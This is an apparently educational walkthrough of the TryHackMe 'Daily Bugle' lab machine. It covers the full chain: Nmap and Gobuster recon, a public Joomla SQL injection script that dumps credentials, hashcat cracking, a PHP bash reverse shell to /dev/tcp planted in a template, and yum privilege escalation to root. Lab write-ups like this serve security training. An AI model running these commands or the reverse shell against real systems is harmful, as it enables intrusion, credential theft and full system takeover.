Daily Bugle — TryHackMe
Target: 10.10.234.9
A walkthrough on Daily Bugle machine on TryHackMe running Joomla CMS focusing on SQL injection and privilege escalation.
So let’s start with our Nmap scan,
nmap 10.10.234.9 -sCV -O -p0–5000
(-sCV for default NSE scripts and to determine version of service running on discovered ports, -O for OS detection & -p for scanning port range 0–5000)
Our Nmap scan discovered Port 22, 80 & 3306 open, interestingly Port 80 is running Joomla CMS
Checking out the URL in web browser, we can see what’s happening on Port 80 and here is the answer to our first question, “who robs the bank?”
We’ll go ahead and do a directory bruteforcing on the target using Gobuster
gobuster dir -u 10.10.234.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
(dir for directory bruteforcing, -u for target URL, -w for wordlist file)
The attack has discovered some directories, we’ll go ahead & checkout /administrators in our browser
It shows an admin login panel to manage the Joomla CMS, but we don’t have the credentials right now.
Running a scan using Joomscan gives us more information on the CMS,
joomscan -u 10.10.234.9
(-u for URL)
And it was able to detect the version of the running service, which is the answer to our second question
If you do some research on this version using searchsploit, metasploit framework, rapid7 or exploitdb, it is vulnerable to SQLi. Now we can use sqlmap or msfconsole to exploit it but we’ll go ahead and look for a python script on the internet.
Here’s the one I’m going to use https://github.com/stefanlucas/Exploit-Joomla
python joomla.py http://10.10.234.9/
(you can copy/paste the script & rename the file or just download the file from github an duse it right away)
The script has exploited the target and dumped some credentials, we discovered a username ‘jonah’ and a hashed password.
We’ll now grab the hashed password and try cracking it using hashcat
hashcat -m 3200 hash.txt /home/kali/Documents/rockyou.txt
(-m for mentioning the hash-id, hash.txt contains the hash we found & rockyou is a very popular wordlist)]
And finally we have our cracked password.
You can use hash-identifier to identify hash types and then look for hash-id in this Hashcat cheatsheet, hashcat may take some time to crack the hash depending on how powerful CPU or GPU is on your local machine so, please be patient while it’s done.
We’ll use username ‘jonah’ and the cracked password to login into the Joomla CMS admin page
Clicking on templates in the left sidebar gives us two templates available,
Let’s go for the first one named “Beez3 Details & Files”
Now, we can see all the PHP files, click on index.php
We need a PHP reverse shell script to get a connection from target to our local machine, so look for one on the internet, I’m using this one here
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/YOURLOCALIP/PORT 0>&1’”);
Don’t forget to put your local IP address & any port number, put the script in the index.php and click on the ‘Save’ button
Start a netcat listener on you local machine,
nc -lvnp 1234
(-lvnp for listening, verbose, no DNS lookup & port number respectively)
Clicking on ‘Template preview’ in the CMS gives us a reverse shell on our listener
check username using ‘id’, we are ‘apache’
using ‘ls’ to list files in the directory, we can take a look at ‘configuration.php’ using ‘cat’, which gives us some credentials for the ‘root’ user
Let’s check out /etc/passwd for usernames,
We can see ‘root’ and ‘jjameson’ are the two root users on this machine,
using ‘su’ to switch over to ‘jjameson’ using the password we just found in the configuration.php & using ‘sudo -l’ to list commands accessible by user ‘jjameson’, we can see ‘yum’ is there.
‘yum’ is exploitable, look for exploits on the internet, I’m using this one from GTFObins
Go ahead and use these commands to spawn an interactive root shell, and then check username using ‘id’
We are finally ‘root’, using ‘cd’ to check the home directory for ‘jjameson’ we have the user.txt which contains our user flag and checking out ‘root’ directory, we have root.txt which contains our root flag.
The challenge is now complete.
